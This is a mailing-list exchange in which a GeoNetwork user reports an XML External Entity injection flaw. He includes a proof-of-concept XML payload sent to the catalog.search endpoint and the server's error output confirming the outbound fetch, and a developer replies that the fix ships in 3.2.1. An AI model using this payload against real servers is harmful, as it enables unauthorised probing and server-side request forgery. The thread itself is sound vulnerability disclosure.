Hi,

My name is Mariano Valderrey, and I have scanned my GeoNetwork with Acunetix and found an XML External Entity Injection vulnerability. I found that in GeoServer you have fixed the problem and maybe I can use the solution for GeoNetwork 3.2.
I wonder if you can help me with this.

Here is what I found:

https://www.owasp.org/index.php/XML_External_Entity_%28XXE%29_Processing

**************

To confirm this I sent a specific request with this XML to the URL /geonetwork/srv/eng/catalog.search

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE request [
<!ENTITY include SYSTEM "http://google.com">
]>
<catalog.search>&include;</catalog.search>

And I received this result:

<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8"/>
<title>Error 400 Cannot build ServiceRequest
Cause : Error on line 1 of document http://www.google.com.ar/?gfe_rd=cr&ei=_x9cWI-FMsWB8QfG05vIDA: The content of elements must consist of well-formed character data or markup.
Error : org.jdom.input.JDOMParseException
</title>
</head>
<body><h2>HTTP ERROR 400</h2>
<p>Problem accessing /geonetwork/srv/eng/catalog.search. Reason:
<pre> Cannot build ServiceRequest
Cause : Error on line 1 of document http://www.google.com.ar/?gfe_rd=cr&ei=_x9cWI-FMsWB8QfG05vIDA: The content of elements must consist of well-formed character data or markup.
Error : org.jdom.input.JDOMParseException
</pre></p><hr><a href="http://eclipse.org/jetty">Powered by Jetty:// 9.3.11.v20160721</a><hr/>

</body>
</html>

******************

In the packet capture from the server I can see that it sends a request to http://google.com, and I found in the result that the server was redirected to www.google.com.ar. This confirms the vulnerability.

Sorry for my English,

Greetings and thank you so much.

--
Ing. en Sistemas Mariano Valderrey
Tel. (+54 11) 4331 0074 int. 5727
Unidad Base de Datos y Comunicaciones
Gerencia de Gestión Tecnológica
CONAE

_______________________________________________
GeoNetwork-usuarios-es mailing list
[hidden email]
https://lists.sourceforge.net/lists/listinfo/geonetwork-usuarios-es

Hi Mariano,

This issue is fixed in the 3.2.x branch:

https://github.com/geonetwork/core-geonetwork/commit/8bb55373d0c79fd17bfa40e725cf255c9a019145

and it will be included in version 3.2.1.

Regards,
Jose García

On Wed, Dec 28, 2016 at 6:30 PM, Mariano Valderrey <[hidden email]> wrote:

> Hi,
>
> My name is Mariano Valderrey, and I have scanned my GeoNetwork with
> Acunetix and found an XML External Entity Injection vulnerability. I
> found that in GeoServer you have fixed the problem and maybe I can use
> the solution for GeoNetwork 3.2.
> I wonder if you can help me with this.
>
> Here is what I found:
>
> https://www.owasp.org/index.php/XML_External_Entity_%28XXE%29_Processing
>
> **************
>
> To confirm this I sent a specific request with this XML to the URL
> /geonetwork/srv/eng/catalog.search
>
> <?xml version="1.0" encoding="utf-8"?>
> <!DOCTYPE request [
> <!ENTITY include SYSTEM "http://google.com">
> ]>
> <catalog.search>&include;</catalog.search>
>
> And I received this result:
>
> <html>
> <head>
> <meta http-equiv="Content-Type" content="text/html;charset=utf-8"/>
> <title>Error 400 Cannot build ServiceRequest
> Cause : Error on line 1 of document
> http://www.google.com.ar/?gfe_rd=cr&ei=_x9cWI-FMsWB8QfG05vIDA: The
> content of elements must consist of well-formed character data or markup.
> Error : org.jdom.input.JDOMParseException
> </title>
> </head>
> <body><h2>HTTP ERROR 400</h2>
> <p>Problem accessing /geonetwork/srv/eng/catalog.search. Reason:
> <pre> Cannot build ServiceRequest
> Cause : Error on line 1 of document
> http://www.google.com.ar/?gfe_rd=cr&ei=_x9cWI-FMsWB8QfG05vIDA: The
> content of elements must consist of well-formed character data or markup.
> Error : org.jdom.input.JDOMParseException
> </pre></p><hr><a href="http://eclipse.org/jetty">Powered by Jetty://
> 9.3.11.v20160721</a><hr/>
>
> </body>
> </html>
>
> ******************
>
> In the packet capture from the server I can see that it sends a request to
> http://google.com, and I found in the result that the server was
> redirected to www.google.com.ar. This confirms the vulnerability.
>
> Sorry for my English,
>
> Greetings and thank you so much.
>
> --
> Ing. en Sistemas Mariano Valderrey
> Tel. (+54 11) 4331 0074 int. 5727
> Unidad Base de Datos y Comunicaciones
> Gerencia de Gestión Tecnológica
> CONAE

--
Kind regards,
Jose García
<http://www.geocat.net/>
Veenderweg 13
6721 WD Bennekom
The Netherlands
T: +31 (0)318 416664